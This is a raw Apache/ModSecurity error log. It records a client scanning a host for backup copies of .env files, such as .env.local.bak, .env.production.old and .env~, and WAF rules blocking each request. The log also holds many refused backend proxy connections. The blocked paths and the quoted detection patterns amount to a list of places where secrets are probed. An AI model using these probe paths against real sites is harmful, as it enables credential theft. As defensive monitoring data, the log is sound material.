[Tue May 26 14:39:58.116978 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.117044 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56120] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.117146 2026] [proxy:error] [pid 626747:tid 626934] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.117188 2026] [proxy_http:error] [pid 626747:tid 626934] [client 208.84.100.238:56150] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.118903 2026] [proxy:error] [pid 626747:tid 626930] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.118955 2026] [proxy_http:error] [pid 626747:tid 626930] [client 208.84.100.238:56166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119059 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119101 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119208 2026] [proxy:error] [pid 626747:tid 626944] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119248 2026] [proxy_http:error] [pid 626747:tid 626944] [client 208.84.100.238:56030] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119371 2026] [proxy:error] [pid 626747:tid 626932] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119423 2026] [proxy_http:error] [pid 626747:tid 626932] [client 208.84.100.238:56084] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119544 2026] [proxy:error] [pid 626747:tid 626991] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119587 2026] [proxy_http:error] [pid 626747:tid 626991] [client 208.84.100.238:56186] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119709 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119758 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56018] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.119852 2026] [proxy:error] [pid 626747:tid 626955] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.119892 2026] [proxy_http:error] [pid 626747:tid 626955] [client 208.84.100.238:56072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120066 2026] [proxy:error] [pid 626747:tid 626908] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120116 2026] [proxy_http:error] [pid 626747:tid 626908] [client 208.84.100.238:56070] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120231 2026] [proxy:error] [pid 626747:tid 627000] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120285 2026] [proxy_http:error] [pid 626747:tid 627000] [client 208.84.100.238:56094] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120504 2026] [proxy:error] [pid 626747:tid 626955] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120572 2026] [proxy_http:error] [pid 626747:tid 626955] [client 208.84.100.238:56072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120739 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120812 2026] [proxy_http:error] [pid 626747:tid 626879] [client 208.84.100.238:56126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.120908 2026] [proxy:error] [pid 626747:tid 626886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.120948 2026] [proxy_http:error] [pid 626747:tid 626886] [client 208.84.100.238:56190] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121050 2026] [proxy:error] [pid 626747:tid 626908] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121097 2026] [proxy_http:error] [pid 626747:tid 626908] [client 208.84.100.238:56070] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121201 2026] [proxy:error] [pid 626747:tid 626973] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121266 2026] [proxy_http:error] [pid 626747:tid 626973] [client 208.84.100.238:56202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121385 2026] [proxy:error] [pid 626747:tid 626940] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121440 2026] [proxy_http:error] [pid 626747:tid 626940] [client 208.84.100.238:56142] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121534 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121572 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56120] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121689 2026] [proxy:error] [pid 626747:tid 626933] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121739 2026] [proxy_http:error] [pid 626747:tid 626933] [client 208.84.100.238:56248] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121829 2026] [proxy:error] [pid 626747:tid 626934] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.121868 2026] [proxy_http:error] [pid 626747:tid 626934] [client 208.84.100.238:56150] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.121986 2026] [proxy:error] [pid 626747:tid 626990] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122030 2026] [proxy_http:error] [pid 626747:tid 626990] [client 208.84.100.238:56222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122266 2026] [proxy:error] [pid 626747:tid 626879] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122327 2026] [proxy_http:error] [pid 626747:tid 626879] [client 208.84.100.238:56126] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122422 2026] [proxy:error] [pid 626747:tid 626930] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122462 2026] [proxy_http:error] [pid 626747:tid 626930] [client 208.84.100.238:56166] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122556 2026] [proxy:error] [pid 626747:tid 626969] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122599 2026] [proxy_http:error] [pid 626747:tid 626969] [client 208.84.100.238:56232] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.122703 2026] [proxy:error] [pid 626747:tid 626944] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.122744 2026] [proxy_http:error] [pid 626747:tid 626944] [client 208.84.100.238:56030] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123001 2026] [proxy:error] [pid 626747:tid 626976] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123068 2026] [proxy_http:error] [pid 626747:tid 626976] [client 208.84.100.238:56160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123150 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123211 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56208] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123297 2026] [proxy:error] [pid 626747:tid 626983] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123333 2026] [proxy_http:error] [pid 626747:tid 626983] [client 208.84.100.238:56264] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123456 2026] [proxy:error] [pid 626747:tid 626950] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123508 2026] [proxy_http:error] [pid 626747:tid 626950] [client 208.84.100.238:56236] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123611 2026] [proxy:error] [pid 626747:tid 626895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123666 2026] [proxy_http:error] [pid 626747:tid 626895] [client 208.84.100.238:56268] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123837 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123871 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56208] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.123958 2026] [proxy:error] [pid 626747:tid 626983] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.123995 2026] [proxy_http:error] [pid 626747:tid 626983] [client 208.84.100.238:56264] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124057 2026] [proxy:error] [pid 626747:tid 626886] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124083 2026] [proxy_http:error] [pid 626747:tid 626886] [client 208.84.100.238:56190] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124172 2026] [proxy:error] [pid 626747:tid 626973] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124222 2026] [proxy_http:error] [pid 626747:tid 626973] [client 208.84.100.238:56202] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124328 2026] [proxy:error] [pid 626747:tid 626940] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124377 2026] [proxy_http:error] [pid 626747:tid 626940] [client 208.84.100.238:56142] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124475 2026] [proxy:error] [pid 626747:tid 626933] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124520 2026] [proxy_http:error] [pid 626747:tid 626933] [client 208.84.100.238:56248] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124613 2026] [proxy:error] [pid 626747:tid 626990] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124659 2026] [proxy_http:error] [pid 626747:tid 626990] [client 208.84.100.238:56222] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124846 2026] [proxy:error] [pid 626747:tid 626998] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.124875 2026] [proxy_http:error] [pid 626747:tid 626998] [client 208.84.100.238:56188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.124995 2026] [proxy:error] [pid 626747:tid 626918] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125065 2026] [proxy_http:error] [pid 626747:tid 626918] [client 208.84.100.238:56280] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125159 2026] [proxy:error] [pid 626747:tid 626969] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125201 2026] [proxy_http:error] [pid 626747:tid 626969] [client 208.84.100.238:56232] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125390 2026] [proxy:error] [pid 626747:tid 626963] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125430 2026] [proxy_http:error] [pid 626747:tid 626963] [client 208.84.100.238:56172] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125542 2026] [proxy:error] [pid 626747:tid 627000] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125590 2026] [proxy_http:error] [pid 626747:tid 627000] [client 208.84.100.238:56094] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125679 2026] [proxy:error] [pid 626747:tid 626895] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125714 2026] [proxy_http:error] [pid 626747:tid 626895] [client 208.84.100.238:56268] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.125876 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.125954 2026] [proxy_http:error] [pid 626747:tid 626898] [client 208.84.100.238:56006] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126075 2026] [proxy:error] [pid 626747:tid 626950] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126126 2026] [proxy_http:error] [pid 626747:tid 626950] [client 208.84.100.238:56236] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126372 2026] [proxy:error] [pid 626747:tid 626918] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126434 2026] [proxy_http:error] [pid 626747:tid 626918] [client 208.84.100.238:56280] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126571 2026] [proxy:error] [pid 626747:tid 626898] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126607 2026] [proxy_http:error] [pid 626747:tid 626898] [client 208.84.100.238:56006] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126702 2026] [proxy:error] [pid 626747:tid 626998] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126739 2026] [proxy_http:error] [pid 626747:tid 626998] [client 208.84.100.238:56188] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.126851 2026] [proxy:error] [pid 626747:tid 626981] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.126902 2026] [proxy_http:error] [pid 626747:tid 626981] [client 208.84.100.238:56108] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.127033 2026] [proxy:error] [pid 626747:tid 626976] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.127098 2026] [proxy_http:error] [pid 626747:tid 626976] [client 208.84.100.238:56160] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.436307 2026] [proxy:error] [pid 626747:tid 626928] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.436368 2026] [proxy_http:error] [pid 626747:tid 626928] [client 208.84.100.238:56050] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.436970 2026] [proxy:error] [pid 626747:tid 626928] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.437001 2026] [proxy_http:error] [pid 626747:tid 626928] [client 208.84.100.238:56050] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.660304 2026] [security2:error] [pid 626747:tid 626924] [client 208.84.100.238:56012] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVjZhVF8Qmdmw_OMfIOUgAAATk"]
[Tue May 26 14:39:58.661307 2026] [proxy:error] [pid 626747:tid 626959] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.661356 2026] [proxy_http:error] [pid 626747:tid 626959] [client 208.84.100.238:56038] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.661936 2026] [proxy:error] [pid 626747:tid 626959] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.661977 2026] [proxy_http:error] [pid 626747:tid 626959] [client 208.84.100.238:56038] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.662577 2026] [proxy:error] [pid 626747:tid 626941] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.662648 2026] [proxy_http:error] [pid 626747:tid 626941] [client 208.84.100.238:56054] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.663210 2026] [proxy:error] [pid 626747:tid 626941] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.663237 2026] [proxy_http:error] [pid 626747:tid 626941] [client 208.84.100.238:56054] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.862505 2026] [security2:error] [pid 626747:tid 626938] [client 208.84.100.238:56402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahVjZhVF8Qmdmw_OMfIOXwAAAUc"]
[Tue May 26 14:39:58.862534 2026] [security2:error] [pid 626747:tid 626899] [client 208.84.100.238:56400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahVjZhVF8Qmdmw_OMfIOYAAAASA"]
[Tue May 26 14:39:58.862540 2026] [security2:error] [pid 626747:tid 626964] [client 208.84.100.238:56456] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVjZhVF8Qmdmw_OMfIOXgAAAWE"]
[Tue May 26 14:39:58.862579 2026] [security2:error] [pid 626747:tid 626944] [client 208.84.100.238:56428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahVjZhVF8Qmdmw_OMfIOYgAAAU0"]
[Tue May 26 14:39:58.862666 2026] [security2:error] [pid 626747:tid 626932] [client 208.84.100.238:56438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahVjZhVF8Qmdmw_OMfIOZAAAAUE"]
[Tue May 26 14:39:58.862844 2026] [security2:error] [pid 626747:tid 626891] [client 208.84.100.238:56350] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahVjZhVF8Qmdmw_OMfIOWQAAARg"]
[Tue May 26 14:39:58.862864 2026] [security2:error] [pid 626747:tid 626991] [client 208.84.100.238:56482] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahVjZhVF8Qmdmw_OMfIOZQAAAXw"]
[Tue May 26 14:39:58.863283 2026] [security2:error] [pid 626747:tid 626902] [client 208.84.100.238:56390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahVjZhVF8Qmdmw_OMfIOZwAAASM"]
[Tue May 26 14:39:58.863305 2026] [proxy:error] [pid 626747:tid 627003] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.863356 2026] [proxy_http:error] [pid 626747:tid 627003] [client 208.84.100.238:56412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.863495 2026] [security2:error] [pid 626747:tid 626957] [client 208.84.100.238:56440] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahVjZhVF8Qmdmw_OMfIOWgAAAVo"]
[Tue May 26 14:39:58.863742 2026] [proxy:error] [pid 626747:tid 626931] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.863816 2026] [proxy_http:error] [pid 626747:tid 626931] [client 208.84.100.238:56470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.863975 2026] [proxy:error] [pid 626747:tid 627003] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.864010 2026] [proxy_http:error] [pid 626747:tid 627003] [client 208.84.100.238:56412] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.864043 2026] [security2:error] [pid 626747:tid 626940] [client 208.84.100.238:56320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVjZhVF8Qmdmw_OMfIOawAAAUk"]
[Tue May 26 14:39:58.864079 2026] [security2:error] [pid 626747:tid 626908] [client 208.84.100.238:56444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahVjZhVF8Qmdmw_OMfIOaAAAASk"]
[Tue May 26 14:39:58.864487 2026] [proxy:error] [pid 626747:tid 626899] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.864522 2026] [proxy_http:error] [pid 626747:tid 626899] [client 208.84.100.238:56314] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.864563 2026] [security2:error] [pid 626747:tid 626912] [client 208.84.100.238:56494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahVjZhVF8Qmdmw_OMfIOXAAAAS0"]
[Tue May 26 14:39:58.864682 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.864741 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56338] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.864851 2026] [proxy:error] [pid 626747:tid 626931] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
